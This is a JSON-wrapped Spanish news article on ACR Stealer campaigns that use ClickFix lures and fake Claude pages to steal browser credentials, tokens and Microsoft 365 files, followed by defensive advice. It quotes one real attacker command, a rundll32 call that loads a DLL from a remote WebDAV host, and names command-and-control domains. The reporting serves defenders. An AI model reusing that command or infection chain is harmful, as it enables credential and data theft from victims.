{"id":1615,"date":"2026-07-17T11:08:27","date_gmt":"2026-07-17T11:08:27","guid":{"rendered":"https:\/\/cybercolombia.co\/index.php\/2026\/07\/17\/acr-stealer-utiliza-senuelos-clickfix-para-robar-tokens-del-navegador-y-archivos-de-microsoft-365-cyberdefensa-mx\/"},"modified":"2026-07-17T11:08:27","modified_gmt":"2026-07-17T11:08:27","slug":"acr-stealer-utiliza-senuelos-clickfix-para-robar-tokens-del-navegador-y-archivos-de-microsoft-365-cyberdefensa-mx","status":"publish","type":"post","link":"https:\/\/cybercolombia.co\/index.php\/2026\/07\/17\/acr-stealer-utiliza-senuelos-clickfix-para-robar-tokens-del-navegador-y-archivos-de-microsoft-365-cyberdefensa-mx\/","title":{"rendered":"ACR Stealer utiliza se\u00f1uelos ClickFix para robar tokens del navegador y archivos de Microsoft 365 \u2013 CYBERDEFENSA.MX"},"content":{"rendered":"<div id=\"articlebody\">\n<p>ACR Stealer, un ladr\u00f3n de informaci\u00f3n en circulaci\u00f3n desde 2024, est\u00e1 saliendo de las redes empresariales con contrase\u00f1as de navegador guardadas, tokens de sesi\u00f3n en vivo, archivos PDF, documentos de Microsoft 365 y archivos de carpetas sincronizadas de OneDrive y SharePoint.<\/p>\n<p>Entra porque alguien peg\u00f3 un comando en un cuadro Ejecutar y presion\u00f3 Enter. microsoft <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/07\/16\/acr-stealer-two-observed-intrusion-chains-amid-increased-threat-activity\/\" target=\"_blank\">establecido<\/a> dos de las cadenas de entrega el jueves. Su equipo Defender Experts, el brazo de detecci\u00f3n administrado de la compa\u00f1\u00eda, hab\u00eda observado el aumento de la actividad de ACR Stealer en los entornos de los clientes desde finales de abril hasta mediados de junio, y dice que las campa\u00f1as est\u00e1n \u00abutilizando con \u00e9xito se\u00f1uelos ClickFix para robar credenciales de navegador, tokens de autenticaci\u00f3n y documentos confidenciales\u00bb.<\/p>\n<p>Ambas cadenas se abren con el mismo mensaje y luego se dividen: una deja rastros en el disco, la otra se ejecuta casi por completo en la memoria. La gu\u00eda de remediaci\u00f3n de Microsoft les dice a las v\u00edctimas que revoquen los tokens, no solo que roten las contrase\u00f1as.<\/p>\n<h2>Una carga \u00fatil en los p\u00edxeles<\/h2>\n<p>El mensaje probablemente llegue a trav\u00e9s de publicidad maliciosa o resultados de b\u00fasqueda manipulados por SEO, seg\u00fan el informe. La cadena sin archivos comienza cuando se genera el comando pegado <code>mshta.exe<\/code> para extraer contenido HTA remoto. Un cargador de VBScript integrado se apoya en objetos COM para decodificar y activar PowerShell; esa etapa genera una identificaci\u00f3n de v\u00edctima, deshabilita la validaci\u00f3n de certificados y ejecuta lo que recupera en la memoria.<\/p>\n<p>Lo que recupera es un JPEG de un servidor de im\u00e1genes, con la carga \u00fatil en los p\u00edxeles. Las rutinas personalizadas lo crean, lo descifran, lo descomprimen y lo ejecutan de manera reflexiva. Luego va por Chrome y Edge, leyendo el <code>Login Data<\/code> y <code>Web Data<\/code> bases de datos e invocar DPAPI para descifrar las contrase\u00f1as, cookies y tokens que contienen. Los archivos PDF en el escritorio y en Descargas tambi\u00e9n van.<\/p>\n<p>El 26 de mayo, Brad Duncan, responsable del SANS Internet Storm Center <a href=\"https:\/\/isc.sans.edu\/diary\/Possible+ACR+Stealer+From+Page+Impersonating+Claude\/33018\/\" target=\"_blank\">document\u00f3 una infecci\u00f3n de Windows<\/a> rastre\u00f3 hasta una p\u00e1gina que se hac\u00eda pasar por Claude, el asistente de inteligencia artificial de Anthropic, a la que se acced\u00eda a trav\u00e9s de anuncios maliciosos de Google y que a menudo se escond\u00eda detr\u00e1s <code>sites.google.com<\/code> URL. La p\u00e1gina ofrec\u00eda instrucciones de macOS cuando se abr\u00eda en una Mac y instrucciones de Windows cuando se abr\u00eda en Windows.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/ai-vuln-protection-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Ciberseguridad\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjQl2axNwsfhbXOFynrg_uAZsvHi3OvNGSA8KJO-BKR8Xm3x7yjKV3EvfY4v5mwXx6LF0uWFb9h9d9iAV_Pi-YYhqimX9wx4OaLdDJEdR215Xrxq_PAtXkaLfQso4pTSjbj6fvh_ZTliLpzWZSZfcoZgyXtKwhN-SSDDlmbtUqGLshc0KqYQGWYHMN52Sl1\/s728-e100\/zz-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>Microsoft nunca nombra el se\u00f1uelo. Dos de los indicadores de su tabla de la Campa\u00f1a 2, <code>creativecommunityinfo[.]art<\/code> y <code>enhanceblabber[.]cc<\/code>figuran como host de carga \u00fatil y C2. The Hacker News compar\u00f3 ambos con la cadena de Duncan, que recorr\u00eda los subdominios de cada uno siete semanas antes, y el informe de Microsoft cita su diario entre las referencias.<\/p>\n<p>Esa cadena tambi\u00e9n sac\u00f3 un JPEG de 628 KB de ImgBB, un servicio de alojamiento de im\u00e1genes. Lo marc\u00f3 como parte de la infecci\u00f3n y no obtuvo nada: \u00abtampoco pude encontrar ning\u00fan signo evidente de datos incrustados\u00bb.<\/p>\n<p><a href=\"https:\/\/redcanary.com\/blog\/threat-intelligence\/intelligence-insights-may-2026\/\" target=\"_blank\">canario rojo<\/a> hab\u00eda registrado se\u00f1uelos de la marca Claude un mes antes, entregando ACR Stealer a trav\u00e9s de p\u00e1ginas falsas de Claude Code en GitLab, como <code>claude-desktop[.]gitlab[.]io<\/code>.<\/p>\n<h2>La otra cadena deja huellas<\/h2>\n<p>La primera cadena de Microsoft escribe en el disco, lo que deja a los defensores m\u00e1s con qu\u00e9 trabajar. El comando pegado extrae una DLL directamente de un recurso compartido WebDAV a trav\u00e9s de HTTPS, utilizando un directorio GUID y un nombre de archivo creado para pasar como otra cosa; el ejemplo del informe es <code>google.ct<\/code>.<\/p>\n<p>Red Canary public\u00f3 la misma forma en su informe de mayo, a partir de la telemetr\u00eda de abril, semanas antes del art\u00edculo de Microsoft:<\/p>\n<pre>\"C:\\Windows\\system32\\rundll32.exe\" \\\\sphere-api.dialectosphere.in[.]net\\05fe317c-0981-4de2-bc8a-930d369db441\\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1<\/pre>\n<p>Dos de las tres variantes que Defender Experts vio utilizar <code>pushd<\/code> Primero debe montar el recurso compartido remoto como una unidad local temporal, de modo que la carga \u00fatil se ejecute a trav\u00e9s de lo que parece una ruta local. El m\u00e1s sigiloso envuelve eso en <code>conhost.exe --headless<\/code> para cerrar la ventana de la consola y oculta las cadenas para <code>pushd<\/code>, <code>rundll32<\/code>y el host remoto detr\u00e1s de la expansi\u00f3n retrasada de las variables de entorno.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj0nt-zc4YATBtEeQDFCOo2lAesVlEIerY4YgJbUnsMk-1Hm7p2Tkz5XcK7gDhoC-yoGASTMGQjbxyGXz82urOqLoSXOg_kT3sg0u6rY88sN6_eVDOtB5EmkT6JwgrgHGufL2H_jAysyiUgFYzL1ljFk7bfR9N_IcttjEFKXSl5wp4_U9E90LXoKVxi__0\/s1700-e365\/ms-clickfix.jpg\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj0nt-zc4YATBtEeQDFCOo2lAesVlEIerY4YgJbUnsMk-1Hm7p2Tkz5XcK7gDhoC-yoGASTMGQjbxyGXz82urOqLoSXOg_kT3sg0u6rY88sN6_eVDOtB5EmkT6JwgrgHGufL2H_jAysyiUgFYzL1ljFk7bfR9N_IcttjEFKXSl5wp4_U9E90LXoKVxi__0\/s1700-e365\/ms-clickfix.jpg\" alt=\"\" border=\"0\" data-original-height=\"498\" data-original-width=\"1187\"\/><\/a><\/div>\n<p>Lo que sigue es PowerShell ofuscado. Coloca un ZIP en una carpeta debajo <code>%LocalAppData%\\Temp<\/code> con un nombre inofensivo; El ejemplo de Microsoft es <code>LogiOptionsPlus<\/code>. un paquete <code>pythonw.exe<\/code> luego inicia el script Python, por lo que no aparece nada en la pantalla. El instalador borra las copias m\u00e1s antiguas antes de realizar la instalaci\u00f3n, lo que lo convierte en un actualizador.<\/p>\n<p>Persiste a trav\u00e9s de una tarea programada oculta que se hace pasar por una actualizaci\u00f3n de software, copia marcas de tiempo <code>notepad.exe<\/code> en sus propios archivos y borra el historial de PowerShell detr\u00e1s de \u00e9l. La \u00faltima etapa permanece en la memoria y se ejecuta a trav\u00e9s de la API de Windows Fiber.<\/p>\n<p>En un subconjunto de estas intrusiones, un segundo cargador de Python se comunica con los puntos finales RPC p\u00fablicos de blockchain y la infraestructura de nodos Web3, probablemente extrayendo una carga \u00fatil o una direcci\u00f3n C2 de un libro de contabilidad p\u00fablico. Microsoft llama a la t\u00e9cnica EtherHiding: coloque el puntero en un contrato inteligente y no quedar\u00e1 ning\u00fan solucionador controlado por el atacante que aprovechar.<\/p>\n<h2>Sin errores, sin n\u00fameros<\/h2>\n<p>Ninguna cadena explota una vulnerabilidad. Ambos heredan exactamente lo que el usuario que inici\u00f3 sesi\u00f3n ya tiene, y cada capa posterior, el montaje WebDAV, la extracci\u00f3n de p\u00edxeles y la transferencia en memoria, solo se ejecuta porque una persona ley\u00f3 un mensaje y presion\u00f3 Enter. No hay CVE en esta historia. La aplicaci\u00f3n de parches no elimina la ruta de pegar y ejecutar.<\/p>\n<p>Microsoft dice que los se\u00f1uelos est\u00e1n funcionando, pero nunca lo cuantifica. El informe no proporciona un recuento de v\u00edctimas, ni un n\u00famero de clientes afectados, ni una base de referencia para el aumento que informa.<\/p>\n<p>La telemetr\u00eda de abril de Red Canary al menos tiene n\u00fameros. ClearFake, un cl\u00faster de inyecci\u00f3n web que ha estado alimentando a ACR Stealer desde al menos marzo de 2025, ocup\u00f3 el puesto n\u00famero uno en su lista de amenazas m\u00e1s frecuentes por primera vez ese mes, y ACR Stealer entr\u00f3 entre los diez primeros empatando en el sexto lugar.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/sygnia-cyber-response-d-2\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Ciberseguridad\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjHcvlLVmAqlffm6kG54_0cGVf8WfcgzqT9B0fBSizSSeIjh8tBepXnrf6BMqKiG344WgqNejcRtEFKT1PmOzQNQBhdmu2iz9Po10z0SSDlFuZ37iip2uYibJDoxTEkbUI7Bx8NJM2Io_z_nl5p4YA-ZhqFLfi0GW1axyu-lQx-iytCn9RGSJ2iqCwdyv8m\/s1600\/sy-d-2.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>El cl\u00faster se entrega a trav\u00e9s de JavaScript inyectado en sitios comprometidos y el informe de Microsoft no lo menciona en ninguna de las cadenas.<\/p>\n<h2>\u00bfDe qui\u00e9n es este ladr\u00f3n?<\/h2>\n<p>Microsoft tiene cuidado con lo que afirma. Vincula la actividad con ACR Stealer seg\u00fan el comportamiento observado y el arte posterior a la explotaci\u00f3n, se compara con lo que se sabe p\u00fablicamente sobre la infraestructura de la familia y no nombra ning\u00fan actor de amenaza. La precauci\u00f3n se gana.<\/p>\n<p>ACR, tambi\u00e9n escrito como AcridRain, fue comercializado en foros de habla rusa por un actor conocido como SheldIO, que cerr\u00f3 las ventas en julio de 2024. Las cuentas se dividieron sobre lo que sucedi\u00f3 despu\u00e9s. <a href=\"https:\/\/www.esentire.com\/blog\/evalusion-campaign-delivers-amatera-stealer-and-netsupport-rat\" target=\"_blank\">eSentire<\/a> dice que el c\u00f3digo fuente se vendi\u00f3. El relato de Proofpoint difiere: el mismo canal de Telegram anunci\u00f3 el cierre, no un adi\u00f3s del equipo, y el panel de Amatera apareci\u00f3 cinco meses despu\u00e9s.<\/p>\n<p>En cuanto al cambio de marca, est\u00e1n de acuerdo. Punto de prueba <a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/amatera-stealer-rebranded-acr-stealer-improved-evasion-sophistication\" target=\"_blank\">reportado en junio de 2025<\/a> que \u00abACR Stealer fue significativamente actualizado y renombrado como Amatera Stealer\u00bb, con un precio de $199 por mes a $1,499 por a\u00f1o. Red Canary trata a ACR y Amatera como una familia y eval\u00faa al propio ACR como un GrMsk Stealer actualizado.<\/p>\n<p>Una detecci\u00f3n de julio de 2026 denominada ACR Stealer es una llamada de comportamiento en una base de c\u00f3digo cuyo nombre ha cambiado al menos una vez y puede haber cambiado de propietario. La etiqueta describe el c\u00f3digo. No te dice qui\u00e9n lo dirige.<\/p>\n<h2>donde detenerlo<\/h2>\n<p>Un control se encuentra antes de cada t\u00e9cnica anterior: ninguna cadena se ejecuta sin que un usuario pegue un comando en el cuadro de di\u00e1logo Ejecutar.<\/p>\n<ul>\n<li>Corta el vector. eSentire recomienda eliminar el mensaje Ejecutar a trav\u00e9s de GPO y bloquear <code>mshta.exe<\/code> a trav\u00e9s de AppLocker o WDAC.<\/li>\n<li>Utilice reglas de control de aplicaciones y reducci\u00f3n de la superficie de ataque para que PowerShell, Python, <code>mshta.exe<\/code>y <code>rundll32.exe<\/code> no puede iniciar contenido entregado por Internet desde <code>Downloads<\/code>, <code>Temp<\/code>o <code>%LocalAppData%<\/code>.<\/li>\n<li>Caza <code>rundll32.exe<\/code> ejecut\u00e1ndose sin par\u00e1metros de l\u00ednea de comando mientras se establece una conexi\u00f3n de red, que es la oportunidad de detecci\u00f3n de Red Canary para esta familia. Agregue tareas programadas que se hacen pasar por actualizaciones de software, tiempos de espera y borrado del historial de PowerShell.<\/li>\n<li>En un host sospechoso, a\u00edsle, rote credenciales, revoque tokens y verifique las conexiones salientes a recursos compartidos remotos y servicios de alojamiento de im\u00e1genes.<\/li>\n<\/ul>\n<p>Microsoft envi\u00f3 tres consultas de b\u00fasqueda de Defender XDR y 16 dominios de campa\u00f1a con el informe.<\/p>\n<p>Esos indicadores son una porci\u00f3n, y el informe as\u00ed lo dice: representativos, no el rango completo de la familia, con m\u00e1s campa\u00f1as e infraestructura probablemente activas. Los dominios rotan. La pregunta en el frente no, porque funciona. Los se\u00f1uelos se superponen en lugar de reemplazarse: Red Canary vio CAPTCHA falsos y p\u00e1ginas de Claude falsas en la misma telemetr\u00eda de abril.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>ACR Stealer, un ladr\u00f3n de informaci\u00f3n en circulaci\u00f3n desde 2024, est\u00e1 saliendo de las redes empresariales con contrase\u00f1as de navegador guardadas, tokens de sesi\u00f3n en vivo, archivos PDF, documentos de Microsoft 365 y archivos de carpetas sincronizadas de OneDrive y SharePoint. Entra porque alguien peg\u00f3 un comando en un cuadro Ejecutar y presion\u00f3 Enter. microsoft [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1379,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,5],"tags":[3853,1339,528,24,70,50,396,36,703,1474,532,48,216],"class_list":["post-1615","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-trending","tag-acr","tag-archivos","tag-clickfix","tag-cyberdefensa-mx","tag-del","tag-microsoft","tag-navegador","tag-para","tag-robar","tag-senuelos","tag-stealer","tag-tokens","tag-utiliza"],"_links":{"self":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/1615","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/comments?post=1615"}],"version-history":[{"count":0,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/1615\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media\/1379"}],"wp:attachment":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media?parent=1615"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/categories?post=1615"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/tags?post=1615"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}